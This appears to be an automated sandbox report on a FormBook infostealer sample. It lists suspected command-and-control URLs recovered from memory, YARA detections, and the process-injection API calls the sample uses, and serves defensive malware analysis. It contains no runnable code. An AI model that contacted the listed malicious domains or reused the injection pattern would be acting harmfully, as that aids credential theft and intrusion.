Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merrycleanteam.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merrycleanteam.com/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merrycleanteam.com/v15n/www.kurainu.xyz
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merrycleanteam.comReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mirotcg.info
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mirotcg.info/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mirotcg.info/v15n/www.dyahwoahjuk.store
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mirotcg.infoReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mpo525.monster
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mpo525.monster/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mpo525.monster/v15n/www.vicmvm649n.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mpo525.monsterReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nijssenadventures.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nijssenadventures.com/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nijssenadventures.com/v15n/www.dnwgt80508yoec8pzq.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nijssenadventures.comReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.turbo3club.site
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.turbo3club.site/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.turbo3club.site/v15n/www.agenkilat-official.space
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.turbo3club.siteReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vicmvm649n.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vicmvm649n.top/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vicmvm649n.top/v15n/www.go4stores.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vicmvm649n.topReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.visualvarta.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.visualvarta.com/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.visualvarta.com/v15n/www.nijssenadventures.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.visualvarta.comReferer:
Source: explorer.exe, 0000000A.00000000.2078451018.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4486803346.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3101417331.000000000C512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811463155.000000000C512000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000A.00000000.2065592098.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3100045279.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.2065592098.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4478274172.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000003.3094890002.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2051585715.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4476301947.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000A.00000002.4484431911.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094644679.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3102587400.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000003.3097577275.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4484488768.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094644679.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000000.2078451018.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4486803346.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000A.00000000.2074669355.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000A.00000000.2074669355.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: CZyOWoN2hiszA6d.exe, dacYzRiJuWECy.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: explorer.exe, 0000000A.00000002.4490198353.000000001191F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4475737181.000000000559F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.4489782694.0000000010A4E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: Process Memory Space: CZyOWoN2hiszA6d.exe PID: 1076, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: CZyOWoN2hiszA6d.exe PID: 7256, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmstp.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mstsc.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.CZyOWoN2hiszA6d.exe.2aa3d10.0.raw.unpack, .cs	Large array initialization: : array initializer size 37142
Source: 0.2.CZyOWoN2hiszA6d.exe.72a0000.5.raw.unpack, .cs	Large array initialization: : array initializer size 37142
Source: 11.2.dacYzRiJuWECy.exe.24d3d94.0.raw.unpack, .cs	Large array initialization: : array initializer size 37142

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A360 NtCreateFile,	9_2_0041A360
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A410 NtReadFile,	9_2_0041A410
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A490 NtClose,	9_2_0041A490
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A540 NtAllocateVirtualMemory,	9_2_0041A540
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A40B NtReadFile,	9_2_0041A40B
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_0041A48A NtClose,	9_2_0041A48A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01AB2BF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2B60 NtClose,LdrInitializeThunk,	9_2_01AB2B60
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2AD0 NtReadFile,LdrInitializeThunk,	9_2_01AB2AD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01AB2DF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2DD0 NtDelayExecution,LdrInitializeThunk,	9_2_01AB2DD0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_01AB2D30
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_01AB2D10
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_01AB2CA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01AB2C70
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2FB0 NtResumeThread,LdrInitializeThunk,	9_2_01AB2FB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2F90 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01AB2F90
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2FE0 NtCreateFile,LdrInitializeThunk,	9_2_01AB2FE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2F30 NtCreateSection,LdrInitializeThunk,	9_2_01AB2F30
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01AB2EA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_01AB2E80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB4340 NtSetContextThread,	9_2_01AB4340
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB4650 NtSuspendThread,	9_2_01AB4650
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2BA0 NtEnumerateValueKey,	9_2_01AB2BA0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2B80 NtQueryInformationFile,	9_2_01AB2B80
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2BE0 NtQueryValueKey,	9_2_01AB2BE0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2AB0 NtWaitForSingleObject,	9_2_01AB2AB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2AF0 NtWriteFile,	9_2_01AB2AF0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2DB0 NtEnumerateKey,	9_2_01AB2DB0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2D00 NtSetInformationFile,	9_2_01AB2D00
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB2CF0 NtOpenProcess,	9_2_01AB2CF0
